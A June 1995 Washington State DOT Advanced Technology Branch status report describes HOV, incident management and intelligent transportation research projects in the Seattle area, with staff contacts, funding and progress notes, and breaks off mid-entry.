Projects June 1995 WSDOT Advanced Technology Branch Washington State Transportation Center Mail Stop 354802 1107 NE 45th Street, Suite 535 Seattle, WA 98105-4631 (206) 543-3331 Fax (206) 685-0767 ADVANCED TECHNOLOGY BRANCH Status Report of Active Projects Washington State Department of Transportation JUNE 1995 Table of Contents HOV, TDM, and Related Projects 1 Travel Time Video Test 1 I-90 Lane Conversion. 1 HOV Lane Evaluation and Monitoring. 2 HOV Lane Evaluation and Monitoring (Phase II). 2 I-5 South HOV Lane Accident Analysis 3 Intercounty Carpool Profile. 3 An Analysis of Factors Accounting for Successes and Failures in the Acceptance and Utilization of Employer-Based TDM Programs. 3 Incident Management Projects 3 Incident Response Data Base. 3 Evaluation and Application of Washington State's Incident Response Guide. 4 Incident Management Training for WSDOT Personnel. 4 The Use of Total Station Surveying Equipment for Accident Investigation: A National Perspective. 4 ITS Projects 4 North Seattle Advanced Traffic Management System 4 BusView 5 Traffic Data Acquisition and Distribution (TDAD) 5 Puget Sound Help Me (PuSHME) Operational Test 5 A Real Time Traveler Information System for Reducing Urban Freeway Congestion, Expansion, Implementation, and Evaluation. 5 Improved Congestion Prediction Algorithm. 6 Improved Error Detection and Incident Detection Using Prediction Techniques and Video Imaging. 6 Bellevue Smart Traveler Using Traveler Information to Reduce Downtown SOV Commuting. 6 In-Vehicle Signing and Variable Speed Limit Demonstration. 7 Seattle to Portland Inter-city IVHS Corridor Study and Communication Plan 7 Portland to Boise ITS Corridor Study 7 Seattle to Vancouver, B.C., and Seattle to Spokane ITS Corridor Study 8 Assessment of ATIS in Washington State. 8 IVHS Data and Information Structure. 8 Investigation of Video Image Tracking. 8 IVHS Backbone Design and Demonstration. 9 Demonstration of ATIS/ATMS Data Fusion in a Regional IVHS. 9 IVHS - Network and Data Fusion. 9 Investigation of Automatic Vehicle Location Systems for Traveler Information. 9 Ramp Control via Neural Network Control. 9 Fuzzy Logic Ramp metering. 10 SWIFT - Seattle Wide-area Information For Travelers. 10 SWIFT Smart Traveler. 10 NEXRAD NEXt Generation Weather RADar. 10 Increasing Awareness of Transportation Options Through Riderlink. 10 Community Transit Arterial System Area-Wide Priority (CT ASAP) 11 Additional ITS Projects 11 Regional Automated Trip Planning. 11 Regional Ridematch. 11 Regional Ridematch Hotline. 11 Regional Fare Integration Project. 11 Smart Bus. 12 Other Projects 12 Traffic Congestion Monitoring-Urban Areas. 12 ENTERPRISE. 12 Accident Risks Using Roadway Geometrics. 13 Advanced Transportation Technology Application Policy Plan. 13 ADVANCED TECHNOLOGY BRANCH Status Report of Active Projects Washington State Department of Transportation June 1995 At the beginning of each project description, one or two names are listed to call for further information. The first name is the WSDOT TRAC person or the Metro person. When a second name is listed, it is usually the principal investigator (P.I.). The phone numbers for each person follow: PHONE NUMBERS phone number WSDOT TRAC Pete Briglia (206) 543-3331 Morgan Balogh (206) 543-0078 Eldon L. Jacobson (206) 685-3187 Bill Legg (206) 543-3332 Larry Senn (206) 543-6741 U.W./W.S.U. P.I. Earl Butterfield (206) 685-2123 Dan Dailey (206) 543-2493 Mark Hallenbeck (206) 543-6261 Mark Haselkorn (206) 543-2577 Fred Mannering (206) 543-8935 Nancy L. Nihan (206) 543-9639 G. Scott Rutherford (206) 685-2481 Jan Spyridakis (206) 685-1557 Cy Ulberg (206) 543-0365 Deirdre Meldrum (206) 685-7639 Tom Seliga (206) 685-7092 King County Metro Catherine Bradshaw(206) 684-1770 Wayne Watanabe (206) 684-1633 Roland Bradley (206) 689-3490 Candace Carlson (206) 684-1562 David Cantey (206) 684-6794 Each of the following project descriptions includes recent changes in bold face type, usually at the end of each report, while previously reported information has been changed to unbold. .c.HOV, TDM, and Related Projects % .c.Travel Time Video Test.; (Eldon L. Jacobson) This project is studying the use of high resolution video cameras and computer software that subsequently analyzes the video tapes to compute vehicle travel times using the matching license plate method. WSDOT has arranged for Transformation Systems, Inc., of Houston, Texas to perform the work. The field work will be done during June 19-22, 1995, with the analysis and the report received about a month later. We will be looking at travel times between HOV lanes and GP lanes. % .c.I-90 Lane Conversion.; (Eldon L. Jacobson or Fred Mannering) This project studied the impacts of converting a general purpose lane to an HOV lane on I-90 between Issaquah and Eastgate (sometimes called take-a-lane). The westbound conversion (and added lane) was fully operational on December 6, 1993. During January, 1994, the lane configuration was revised in the Mercer Slough area, creating a bottleneck section on westbound I-90 that has two general purpose lanes plus the HOV lane. After a couple of months the complaints quieted, and people appear to have become used to the situation. On June 27, 1994, westbound I-90 ramp metering was implemented. Some video tape for the RafterS data survey was collected the week before the ramp meter turn-on. The draft report was circulated for review late November, 1994. Comments have been incorporated into the final report by the P.I. The final report is complete and has been published. Project complete. % .c.HOV Lane Evaluation and Monitoring.; (Eldon L. Jacobson or Cy Ulberg) This project will produce the first annual (July, 1992 thru June, 1993) HOV system evaluation, on the basis of the methodology developed in the above project. It is important to periodically monitor and evaluate existing HOV lanes in order to make decisions about the operation of existing HOV lanes and about the best location to construct future HOV lanes. The evaluation will consider HOV lane usage, violations, safety, time savings, capacity improvements, modal shifts, route shifts, enforcement issues, cost effectiveness, and public opinion. The project will build on existing information to construct a database for evaluation of HOV lanes. Quarterly, annual, and biennial reports will be published. At the end of the research, recommendations will be made about the type of data necessary to do an HOV lane evaluation, the data collection methodology, what agencies should be involved in HOV lane evaluations, and the timing and format of HOV evaluation reports. Surveys for I-5 South of Seattle (the Southcenter hill area to Midway) were mailed out to motorists the week of February 10, 1992. Opinion surveys for Metro bus drivers in the I-5 South corridor were handed out in late, February, 1992, and returned in early March, 1992. All surveys have been tabulated and summarized. Data collection is now proceeding throughout the Seattle area. In addition to obtaining travel time and vehicle occupancy in the freeway mainline, vehicle occupancy is also being obtained at some ramps. Ramps are usually easier to monitor, and should reflect occupancy changes sooner than the higher volumes on the mainline. This project was supplemented to evaluate the change from a 3 person carpool definition to a 2 person carpool definition on I-5 north of the Seattle CBD. The draft report for the 2+ demo (prepared by TRAC and TTI) was received on January 27, 1992. The final report for the 2+ demo is now available. Contact Eldon if you want a copy. The results indicate that vehicle occupancy decreased, reliability decreased and travel time increased in the northbound direction, much of the driving public approves of 2+, and there was no evidence that the project affected accident rates. The steering committee made three recommendations. First, the results of the demonstration project do not support existing policies. Second, the 2+ should revert to 3+ after a minimum 60 day period. Third, future occupancy requirement decisions should be based on a performance standard that measures speed and reliability. A second supplemental project to the original project was funded. This second project developed a performance standard that measures speed and reliability. The intention was to have an easily measured reliability standard for HOV lanes, which could be used when considering revising the carpool definition for a particular HOV corridor. During April and May, 1992, data collection was done on the I-5 North corridor that was used in developing the standard. A performance standard was adopted by the WSDOT HOV Policy Board on August 13, 1992. It reads: "HOV lane vehicles should maintain or exceed an average of 45 miles per hour or greater at least 90 percent of the times they use that lane during the peak hour (measured for a consecutive six-month period)." Collection of data continues throughout the area during each Monday to Friday peak period at about 20 different sites. The draft report was distributed before the end of March, 1994. Review comments have been received and the report has been revised. The final report was shipped to the Research Office for printing in December, 1994. Eldon got the final report back to fix some page numbering problems and returned it to the Research Office on February 8, 1995. Final report complete. Project complete. % .c.HOV Lane Evaluation and Monitoring (Phase II).; (Eldon L. Jacobson or CyJUlberg) This is the ongoing data collection and reporting project. Auto occupancy data are being collected every morning and evening peak period Monday through Friday. A 486 computer with a high capacity hard drive has been acquired to aid in the data analysis and storage. A two page legislative briefing report has been prepared. It will be distributed (probably in the Ex*Press) with changes and updates 2 or 3 times a year. Quarterly data updates are being prepared, which will update one of the appendices in the final report described in the previous project. The initial quarterly report is complete (this will actually add the 6 quarters that follow the 4 quarters in Appendix B of the report in the previous project). % .c.I-5 South HOV Lane Accident Analysis; (Eldon L. Jacobson) This is an in-house project to analyze the before and after accident information for the HOV lane termination area at the top of the Southcenter hill. The accident data was provided by the Northwest Region. A draft report was circulated on June 1, 1994, and review comments are being received. % .c.Intercounty Carpool Profile.; (Eldon L. Jacobson or Cy Ulberg) This project will provide knowledge of why people choose to ride share. The primary method to acquire information about a broad range of carpools in the two-county region (Snohomish and King counties) will rely on surveys of a random sample of people observed in carpools on selected freeways, arterials, and streets. A large number of surveys (on the order of 1000) will be conducted by mail, and they may include small incentives to encourage a high return rate. A follow-up survey will be conducted after one year. A smaller sample will be contacted for more intensive personal interviewing (focus groups). This project will be used to enhance the HOV 2+ evaluation. The project match will come from that project in order to direct questions toward the carpool definition change. WeUre waiting for the funds to be released by Metro to start the project. The funds have been released and a U.W. budget number assigned to the project. An initial literature review has been done. Carpool license plates have been collected and the public opinion survey is being finalized for printing. The survey was printed and mailed out in June, 1994. Surveys have been returned and have been coded for analysis. The project has been put on hold until early 1995, as the graduate student who is working on the project, Matt Benuska, is studying for three months in South Korea. % .c.An Analysis of Factors Accounting for Successes and Failures in the Acceptance and Utilization of Employer-Based TDM Programs.; (Bill Legg or Cy Ulberg) This project will carefully investigate the processes that companies employ to implement TDM programs. It will develop a model of the factors that influence employee's attitudes and lead to actual changes in commuting behavior and will be useful to employers throughout the state in designing and implementing successful TDM programs. The project will be coordinated with the State Energy Office and to bolster the work currently being undertaken because of the commute trip reduction legislation. The scope of work was developed in cooperation with Metro and the Energy Office. A new element of the project will be the addition of a consultant to look at a proactive program for multi- site employers to shift personnel around so employees are working at the site nearest their home. The draft final report has been completed and has been distributed for review and comment. This project has be given a $95,000 supplement for a proximate commuting study. This study has been initiated and a detailed evaluation plan is now being developed. Proximate commuting is the concept of decentralizing work so that employees can work closer to their residence thereby reducing commuting time and distance. .c.Incident Management Projects % .c.Incident Response Data Base.; (Bill Legg or Fred Mannering) This project will develop and establish an incident response database. The database will be used to evaluate incident response measures developed and implemented in the Seattle area. This project was approved in February. The first project meeting with the researchers and the Data Annex in Olympia took place the middle of March. The Data Annex installed the CARS database at TRAC on May 27th. The project team is working with WSDOT's 3 western regions and the East Central region to establish a database format Incident report that could be used as a standard for the entire state. This format will be compatible with the States' MicroCars database. Work in also being done on a geographical representation of the MicroCars database by combining it with a GIS system. This project's completion date was extended to 6/31/94 from 12/31/93 to permit more testing of the database. The draft database (the final level of effort for this project) is complete and now being used. We are looking at any additional needs for this project beyond the current completed work. % .c.Evaluation and Application of Washington State's Incident Response Guide.; (Bill Legg or Fred Mannering) This project will evaluate the effectiveness, appropriateness, and format of the incident response guide currently used by WSDOT's North West Region's incident response teams. Based on this evaluation it will produce an updated electronic version of the guide for WSDOT's 3 western regions and the East Central region. Each region will able to customize and update the documents as needed in the future. The project is now complete. .c.Incident Management Training for WSDOT Personnel.; (Bill Legg) This project, through training sessions, will introduce the basic language and protocol for the Incident Command System to the WSDOT IRT members, summarize new and existing state and federal regulations that impact current incident management practices, identify WSDOT IRT training material suitable for periodic "refresher" training, & provide information to Maintenance Area Supervisors on the importance of effective incident management. This project began the first of the year (1995) and training will begin this summer. .c.The Use of Total Station Surveying Equipment for Accident Investigation: A National Perspective.; (Bill Legg) WSDOT took the national leadership role in the implementation of the use of total station surveying equipment by the State Patrol as a way to more quickly clear major accident scenes. This project will determine how the use of total station surveying equipment for accident investigation has expanded to other parts of the nation, what factors encourage the use of the technology, what factors discourage the use of the technology, and how the quantified and perceived benefits change depending on local conditions. The survey of national law enforcement agencies has been completed. .c.ITS Projects % .c.North Seattle Advanced Traffic Management System; (Morgan Balogh) The primary objective of this project is to provide communications to the different traffic control system in the I-5 corridor from Seattle to Marysville. This will enable coordinated operations among the different jurisdictions traffic signal systems and the freeway ramp meter system, provide a regional monitoring and data sharing system, and receive real-time information on traffic and transit conditions. This project will be expandable to the east and south to include the entire Seattle Metropolitan area. Many times political and jurisdictional issues prevent coordinating adjacent systems. These issues will be worked out over the course of the project. This project will endeavor to obtain data from several signal systems in the I-5/SR 99 corridor in north King County and south Snohomish County. The data will be collected by a separate micro-computer through communications links with central traffic control systems (and master controllers if necessary) belonging to the various jurisdictions involved. The micro-computer will compile the volume, occupancy, and operations data and transmit it back out to the participating control systems. Each signal system will independently use the data to improve its traffic management capabilities. TIB funding for this project has been obtained. The City of Seattle was the lead agency for obtaining TIB funds. Oil rebate money is also being used on this project. The FHWA is contributing 3.5 million in state appropriated IVHS money. Dave Berg of the WSDOT, NW Region is managing this project. Farradyne System Inc., is the lead consultant on the project. FSI started work on Nov. 29, 1994. This was the same date that a kickoff meeting was held. FSI has just completed the Control Strategy Report for the project (June 16, 1995). It is currently under review. There have been several user group meetings with the next scheduled for June 17, 1995. FSI is currently working on the system design. % .c.Graphical Display of Real-Time Transit Coach Locations: Toward an APTS for the Puget Sound Region (BusView); (Morgan Balogh, Dan Dailey) The project will design and demonstrate a system that graphically displays real-time transit coach locations to the University of Washington campus community. The system will use Seattle Metro's existing automatic vehicle location system as its information source. This is a $170,000 project sponsored by WSDOT ($100,000) and TRANSNOW $70,000. The completion date is February 1996. The design of the APTS architecture and interfaces is well underway and the evaluation of the accuracy of the AVL data is beginning. The system will be demonstrated at a Transit Conference in Spokane in late August. % .c.Traffic Data Acquisition and Distribution (TDAD); (Morgan Balogh, Dan Dailey) The TDAD project will provide a system that will access available traffic databases and store it in a separate database for historical, research, and planning purposes. Agencies will then be able to request from the system specific records, and obtain these in formats meaningful and useful to them. The initial system will be demonstrated in the Puget Sound area, together with linkages to state level databases and applications. This project is coordinated with the North Seattle ATMS. This project supports regional Congestion Management Plans. The total project cost is $210,000 and is fully funded by the FHWA. UW staff has interviewed the parties that will benefit by this project. They include planning representatives from PSRC, TRIP, FHWA, and the WSDOT N.W. Region. A working paper outlining the system desired by these representative has been prepared and reviewed. The project team is currently working with FSI and the North Seattle ATMS project on system integration requirements. % .c.Puget Sound Help Me (PuSHMe) Operational Test; (Morgan Balogh) The WSDOT has received USDOT operational test funding for a Puget Sound regional mayday system. This is a public-private partnership whose participants include the FHWA, WSDOT, WSP, David Evans and Associates, Inc. (DEA), Sentinel Communications (SenCom), Motorola, IBI Group Inc., and the University of Washington. Other firms involved in this project but not actually on contract are McCaw Cellular and Intergraph. This system will allow a traveler to send a signal indicating their location when they need assistance directly to a traffic operations center who will then dispatch the appropriate units (i.e. tow truck, assistance van, WSP, etc.) The cooperative agreement between WSDOT and the FHWA signed on August 1, 1994. The project started February 3, 1995. A equipment purchase contract was signed between WSDOT and SenCom as of March 3, 1995. A equipment lease between WSDOT and Motorola was signed 4/4/95 . The project Kick-Off meeting is scheduled for March 28, 1995. The evaluation plan is almost complete and should sent to the PuSHMe partners for review in late June. Motorola has installed their GPS Reference station at the TSMC on June 15, 1995 and plan to have their Dispatch running in Mid July. SenCom will begin producing their mayday devices in late June. Mayday testing should begin in late July or early August. % .c.A Real Time Traveler Information System for Reducing Urban Freeway Congestion: Expansion, Implementation, and Evaluation.; (Larry Senn or Mark Haselkorn) This is a continuation of the earlier Real-Time Motorist information project. Several enhancements will be made to the "Traffic Reporter" information system including expanding coverage of the display to include all freeways in the Seattle area and to include separate information on the HOV lanes. Efforts will also be made to improve the quality of travel time data and the quality of electronic data coming from the WSDOT system. This project will provide delivery of the system for use by the public and will evaluate the system under actual use. Traffic Reporter has been expanded to cover the Puget Sound area. Testing is being done to compare "lap top" travel time data to those calculated by Traffic Reporter. Also, usability testing has been conducted on the expanded interface, and will continue once the system is on display. Traffic Reporter can now find multiple freeway routes from a given origin ramp to a given destination ramp. Added features include the ability to compare speed and trip time between these routes, including a comparison of general purpose versus HOV lanes. A rough draft of the final report has been turned into TRAC for preliminary review and should be ready to go to the Research Office soon. % .c.Improved Congestion Prediction Algorithm.; (Improved Ramp Control Algorithm) (Larry Senn or Nancy L. Nihan) This project continues the search for an improved ramp control algorithm based on predictive techniques. The project objectives are to: (1) evaluate the existing data and the performance of the predictive ramp control algorithm used to operate the WSDOT traffic systems computer in Seattle, develop improvements to the existing predictive ramp control algorithm by looking at upstream volumes and lane occupancies and ways to improve pattern recognition, testing the new algorithms on more than one section of freeway. Data collection computer modeling runs have been made and contrary to the proposal will likely need to be conducted periodically throughout the project. Preliminary analyses have been performed and strategies are being discussed to select the algorithm most likely to be productive. TSMC data is now available by modem for UW analysis. Researchers have found that the flow divided by the lane occupancy (F/O) provides a better indicator of congestion than indicators that are currently in use. A F/O of 90 indicates the onset of congestion and an F/O of 70 provides an excellent indicator of congestion. Storage, which is currently used by the freeway system as an indicator of congestion, does not appear to a very good indicator (a result also found in the neural network project). The final report is in review. % .c.Improved Error Detection and Incident Detection Using Prediction Techniques and Video Imaging.; (Larry Senn or Nancy L. Nihan) This project seeks to improve knowledge of the relationship of volume and lane occupancy to the speed of traffic as a means of (1) determining invalid detector data and (2) detecting incidents. In addition the project will attempt to improve the ability to identify bad detector data. Video imaging will be used as an independent check of the volume/occupancy and speed relationships. The video imaging system will itself be evaluated as an incident detection tool and as a tool to obtain vehicle speeds. Morgan Wong is the primary R.A. on this project. He has written a program to get 20 second data from Autoscope and is modeling the data to improve on the existing error and incident detection algorithms. TSMC data is now available by modem for UW analysis. The project team has been collecting additional video data for testing Autoscope. The overall opinion of the researchers is that Autoscope works well enough to be considered in future installations. The draft final report and draft technical report have been submitted for review. % .c.Bellevue Smart Traveler: Using Traveler Information to Reduce Downtown SOV Commuting.; (Eldon L. Jacobson or Mark Haselkorn) This project produced and tested a prototype Traveler Information Center designed to increase the use of transit and paratransit (carpools and vanpools) by downtown Bellevue office workers. The goal was to locate in a downtown Bellevue office complex a prototype computer-based interactive Traveler Information Center that provided office workers with greater access to flexible, reliable, safe, and time efficient alternatives to single occupancy vehicle commuting. The prototype allowed us to gauge the impact of applying ATIS technology to enhancing transit and paratransit. It also allowed us to judge the viability of Traveler Information Centers as a way for downtown centers to meet trip reduction requirements set by the State of Washington. The project was funded by WSDOT and FTA. Work was conducted as a partnership between the Bellevue TMA and the University of Washington. The project was originally scheduled to begin 7/1/92 and end 10/31/93. The FTA funding period ended up being for 15 months, starting 9/30/92, so no-cost time extensions were requested of both the FTA and WSDOT in order that both funding periods ended at the same time. Most of the employee's in the office building (Bellevue Place) were surveyed. Since Microsoft doesn't do surveys, focus groups with Microsoft employees were done the last week in April, 1993. The project was expanded to cover more buildings in downtown Bellevue. Will also use a public-private partnership utilizing pagers donated by PacTel (now Air-Touch). The telephone equipment was purchased, the initial programming of it completed, and it was tested. A media event showcasing the project was done by the U.W. on September 28, 1993. 83 applications were received by the TMA as of November 2, 1993. The kiosk was opened for use in Bellevue Place on November 15, 1993. Three ride groups were formed. Some of the interesting statistics as of the close of the project on April 15, 1994 are: 496 rides offered, 145 rides sought, 6 confirmed ride matches. Preliminary conclusions are that people were much more willing to offer rides than to accept a ride. The draft technical report has been written and was submitted to TRAC the end of August, 1994, for editing and processing. The initial editing generated substantial suggested improvements, so the report was sent back to the P.I. for modification in September, 1994. The draft report has been circulated and review comments received. The P.I. plans on incorporating review comments for the final report during the first week of July, 1995. % .c.In-Vehicle Signing and Variable Speed Limit Demonstration.; (Larry Senn) The project is unique in that its objective is the enhancement of motorists safety on freeway facilities through the display of variable speed limits and other safety messages based on traffic and roadway conditions. These displays are presented using variable message signs and in-vehicle equipment. The proposed project includes the implementation of a variable speed limit and motorist alerting system featuring the use of low cost in-vehicle radio receivers with alphanumeric displays. The system is to be installed on a forty mile section of I-90 approximately 40 miles east of Seattle in the vicinity of the Snoqualmie Pass. The University of Washington will be responsible for the evaluation of the system and the experimental design. The installation of data stations for collection of "before" data is complete and data collection is underway. Farradyne has continued the systems development, and has found solutions to several issues concerning the radio communications system and integration of the weather stations. FCC licenses for all sites have been obtained. The construction contract with Totem Electric is underway and at least three sign bases have been installed. The production of the Daktronics VMS is underway and the inspection of the first sign occurred on June first. We hope to test the in-vehicle devices in '94-'95 using a portable transmitter, however the fixed sites will not have communications until '95-'96 when the entire project will be operational. The UW team has conducted an in-depth accident analysis based on 5 years of accident data and has continued the development of the driving simulator that will be used to evaluate the in-vehicle signing equipment. A detailed evaluation plan has been submitted to NHTSA and has been tentatively approved pending some minor corrections. % .c.Seattle to Portland Inter-city ITS Corridor Study and Communication Plan; (Morgan Balogh) We are in the initial stage of this project. There are three main objectives of the project. The first objective is to develop a plan to reduce congestion and improve safety along the Seattle to Portland I-5 corridor utilizing Intelligent Vehicle-Highway Systems (IVHS) technologies. The second objective is to identify the communications network needed to support the IVHS for the corridor. Additionally, evaluate alternatives and provide recommendations for this network to support WSDOTUs other, non-IVHS, intra-departmental communications requirements along this corridor. The third objective is to develop general recommendations for a statewide WSDOT communication network utilizing the corridor communications analysis. State matching funds have been identified and approved. An Agreement between the FHWA and the WSDOT for the Seattle to Portland Inter-city ITS portion of this project has been made. A request for a service contract to select/hire a consultant was developed and published September 13, 1993. The consultant proposals went through the first stage of the evaluation process. This stage chose the top 3 proposals. The representative of each team was asked to give an oral presentation on December 7, 1993. From these presentations David Evans and Associates was chosen to be the prime consultant. The consultant began work May 2, 1994. The consultant has completed Technical Memorandum #4, Draft ITS Corridor Plan in May and is developing a draft communications plan. % .c.Portland to Boise ITS Corridor Study; (Eldon L. Jacobson) This project is to develop a plan to identify Intelligent Transportation System technologies that should improve some of the known transportation problems in the Portland to Boise corridor. One of the known problems is the poor weather conditions that can rapidly appear in the Columbia Gorge and the Blue Mountains. The corridor includes roads on both sides of the Columbia River, two railroads, and barge shipping. The planned $400,000 consultant study is anticipated to be funded by FHWA, ITD, ODOT, and WSDOT. A draft agreement between the FHWA and the three state DOTs has been drafted by the FHWA Region office. The revised draft proposal was circulated for final comments and support letters. The proposal was submitted to the FHWA the day before the due date of August 1, 1994. Approval from D.C. was received the middle of January, 1995, provided the scope-of-work is approved by the FHWA region office. The draft scope-of-work was circulated for comments the end of February, 1995. The FHWA approval is expected mid-March, 1995, with the RFP planned late in March or April, 1995. Kimley-Horn and Associates, Inc., is the consultant that was selected to do the study. The scope-of-work and cost estimate are being worked on prior to signing the contract. % .c.Seattle to Vancouver, B.C., and Seattle to Spokane ITS Corridor Study; (BillJLegg) This project is to develop a plan to identify Intelligent Transportation System (formally IVHS) technologies that should improve some of the known transportation problems in the two corridors. The two corridors may be studied separately, or together, depending on whether one or both are approved for funding by the FHWA. The planned consultant study is anticipated to be funded by FHWA and WSDOT. Interviews for final consultant selection will be held on June 22nd. Work on this project will begin in the 3rd quarter of 1995. % .c.Assessment of ATIS in Washington State.; (Morgan Balogh) This project is primarily funded by FHWA discretionary moneys. It will provide an early evaluation of 4 ATIS in Washington state (FLOW, Traffic Reporter, Bellevue Smart Traveler, and the proposed Canadian border crossing information system). The project will develop a matrix of ATIS so that appropriate criteria for judging success can be developed and applied. The project will also recommend direction for future ATIS development in the state. Start date for project was 10/01/92 and the completion date for the project is 4/30/94. Tasks completed to date include: (1) Identified classifying system and definitions of success for this project. (2) Designed metrics and instruments for assessing Flow. Delays in the installation of the Vax at TSMC have delayed the implementation of Traffic Reporter and consequently the evaluation of Traffic Reporter. That problem has been corrected and the evaluation continued. The final report was submitted to the Research Office in March, 1995. % .c.IVHS Data and Information Structure.; (Morgan Balogh or Daniel Dailey) The overall objective of this project is to develop a framework in which to understand, select, and apply wireless data communications technology to IVHS development in Washington State. It will (1) review the state of the art of wireless data communications, (2) examine promising wireless communication alternatives, (3) perform a limited field test of selected wireless data communications, and (4) provide the basis for an overall plan to integrate wireless data communications into a regional IVHS network. The final report for this project is due December 31, 1994. The final report was submitted to the Research Office in March, 1995. % .c.Investigation of Video Image Tracking.; (Morgan Balogh or Nancy Nihan) First generation video imaging systems provide Rtrip-wireS type detection, that is they mimic the performance of inductance loops. The newer video imaging tracking system not only gathers loop type data but RfingerprintsS vehicles to provide tracking capabilities. Vehicle tracking provides travel time and origin destination information which has been historically difficult to obtain. The proposed video imaging system for this project is the MOBILIZER, which is provided by Condition Monitoring Systems (CMS) and is in the prototype stages of development. This project will test collected data for reliability and range of usefulness, compare cost effectiveness and total life-cycle cost of the CMS system to that of traditional loop detector systems, and if cost effective, incorporate the system in the WSDOT Traffic Systems Management Center. The final report for this project is due August 31, 1995. Most of the technical problems with the MOBILIZER have been worked out and testing is continuing. % .c.IVHS Backbone Design and Demonstration.; (Larry Senn or Dan Dailey) This project will (1) design a demonstration architecture for a regional IVHS backbone for the Puget Sound area and (2) construct this backbone in order to demonstrate how different types of data gathered from distinct agencies can be integrated in a single application. The backbone will be designed to (a) improve interagency and multi-jurisdictional sharing of data without disrupting existing operations, (b) support existing investment in IVHS technology and system development, (c) encourage expansion and innovation, and (d) be compatible with federal efforts to develop a national IVHS architecture. "The backbone will support traffic data from a multitude of sources while making data accessible in a clearly defined manner on a geographically distributed network. This all will be done in an open systems model that supports a distributed computing environment, is extensible to larger areas, and easily allows new agencies to participate. The T1 link to the TSMC and all hardware elements to set up the communication have been installed. Software to extract the data is operational. Loop data has been interfaced to the GIS application. Software is being developed to make use of the loop data for future research. The final report is being wreitten. % .c.Demonstration of ATIS/ATMS Data Fusion in a Regional IVHS.; (Larry Senn or Dan Dailey) This project proposes to design, construct, and demonstrate a data fusion system for use in a regional IVHS system. The fusion system will combine data for multi-agency and multi-jurisdictional sources to provide a more accurate, real-time picture of the transportation system. This fusion system will operate in a distributed computing environment that encourages interagency cooperation. The computer has been ordered and WSDOT and Metro have been contacted. An IVHS application has been written which displays both congestion data from loops and real time position of transit vehicles on a GIS based map. King County Metro is being contacted for an improved map database. A report is being written in conjunction with an IEEE Intelligent Vehicles Conference "95. % .c.IVHS - Network and Data Fusion.; (Larry Senn or Dan Dailey) This Federally funded project will progress from specific regional issues investigated in other related projects and generalize by creating key network and fusion components that are transferable to other regions and countries. The project will (1) investigate , design, and document an encoding scheme, including ways to include temporal information with spatial information, for standardization of traffic and traveler information, (2) use this encoding scheme to demonstrate a layer between application and transport layers, and (3) work with another related IVHS research center to use the encoding scheme in a demonstration of its use in inter-regional IVHS communication. The investigator has started investigation of FIPS spatial data standard in detail and determined that the full standard is unwieldy for the design of our data encoding system. Adopting an object oriented paradigm to construct self defining data streams. The methodology for constructing the self defined data streams is the encoding stream promised for this project. % .c.Investigation of Automatic Vehicle Location Systems for Traveler Information.; (Larry Senn or Mark Haselkorn) This project will use Metro AVL information to improve information available to travelers and transportation managers. Metro AVL data can now be displayed on any X-terminal connected to the Internet and has been demonstrated many times. This concludes the research portion of the project and a draft final is being formatted foin prepatration for review. % .c.Ramp Control via Neural Network Control.; (Larry Senn or Deirdre Meldrum) This project will develop and test a new ramp metering algorithm by using an artificial neural network congestion predictor and a multi-variable control system. Artificial neural networks have been constructed and tested. Promising results have been obtained with 1 minute data being used to predict volumes and occupancies 1 minute ahead, and somewhat less promising results have been obtained with 5 minute data. The draft technical report has been sent to the Research Office for review. % .c.Fuzzy Logic Ramp metering.; This project will move toward developing the neural network forecasting and fuzzy logic control system including in depth testing using models and on the existing SC&DI system. If budget and time allows the system will be implemented within this project. This project is just starting. % .c.SWIFT - Seattle Wide-area Information For Travelers.; (Larry Senn, Mark Haselkorn, Dan Dailey) This project is a $7.4 million IVHS Operational test of an FM sideband data system which will be used to deliver traffic and transit information. Data will be extracted from WSDOT's freeway ramp control computer, Metro Transit's vehicle location system, and augmented with information from Metro Traffic Control. The information will be formatted and sent to Seiko Telecommunication System for transmission to devices. The devices include a watch (or pager) based on Seiko's Message Watch, Delco Electronics' Telepath car radio that includes a GPS to give distance and bearing to a destination, and a palm top computer that will be supplied by IBM which will provide bus locations and graphic displays of traffic conditions. Etak will supply geo-coding, mapping, and data entry interfaces. The test will occur in 1996 after the devices are programmed and developed. The contract With the SWIFT project team was signed on January 10, 1995 and work has commenced. An evaluation plan from SAIC was submitted at the March 14 Steering Committee meeting and was accepted by the team with minor changes. The UW team is working extensively on the network required to deliver SWIFT information. This project is proceeding on schedule. % .c.SWIFT Smart Traveler: (Larry Senn, Dan Dailey) This project is a companion to the SWIFT project and will allow ad hoc ridesharing amongst UW employees. The large employer base combined with the availability of desktop computers and the campus network should allow for greater number of ride matches than found in previous projects. Web pages have been created, the server is being set up, and geocoding has started to establish rideshare locations. % .c.NEXRAD: NEXt Generation Weather RADar.; (Larry Senn, Tom Seliga) This project is investigating potential applications for the new doppler weather radar in transportation. The potential uses of accurate short term weather predictions include better maintenance scheduling and transit operation improvements from early snow warnings, wind warnings for ferries, and for research into the traffic impacts of inclement weather. The investigators have obtained a disdrometer to assess the distribution of drop sizes in the region, are developing an algorithm for tracking storms, have arranged for data access from the weather radar, and have obtained a SUN workstation for use in the project. Phase 2 of this project has been funded and will continue the work. There will be no report for Phase 1 as it was a preliminary investigation. % .c.Increasing Awareness of Transportation Options Through Riderlink.; (EldonJL.JJacobson) This FHWA/FTA Operation Action Program project intends to develop a Metro database infrastructure that can be used to make transit information (and other information) available at selected work sites. Originally the intent was to team up with US. West Community Link's planned videotext service (The original project was titled: Increasing Public Awareness of Transportation Options Through Videotext). Since the videotext service has been delayed or abandoned, the use of videotext was replaced by planning on using existing computer networks of some of the employers in the Overlake area between Redmond and Bellevue. Metro assigned Catherine Bradshaw to coordinate the project. Initial planning and coordination work began in March, 1994. A detailed evaluation plan dated June 21, 1994, has been submitted. Quarterly reports are being submitted. The following three documents are available: Concept Document, Requirements Document, and Evaluation Plan. I have been able to access the Riderlink initial data pages from my office over the Internet. During January, 1995, Metro publicized the project and made Riderlink available on a World Wide Web site on the Internet to disseminate the information to existing networks at employer sites. All the Overlake TMA sites have connections to Riderlink. As of the end of February, 1995, nearly 4,000 people from all over the world have accessed Riderlink. Metro has continued to include more bus schedules and route maps in the Riderlink system. % .c.Community Transit Arterial System Area-Wide Priority (CT ASAP); (EldonJL.JJacobson) This is the IVHS operational test project that was earmarked by congress for Snohomish County (Community Transit). A proposal was submitted in February, 1994, to DC. requesting $1,500,000 in Federal funds (75%) which will be matched with $375,000 in Community Transit funds (25%). This project plans to implement the most cost effective portion of the Community Transit Arterial HOV study, which was completed in March, 1993. That means installing a bus priority system at about 100 traffic signals in Snohomish County. The North Seattle ATMS project will utilize the data and METRO will install the same signal priority system on SR 99. This will be the first 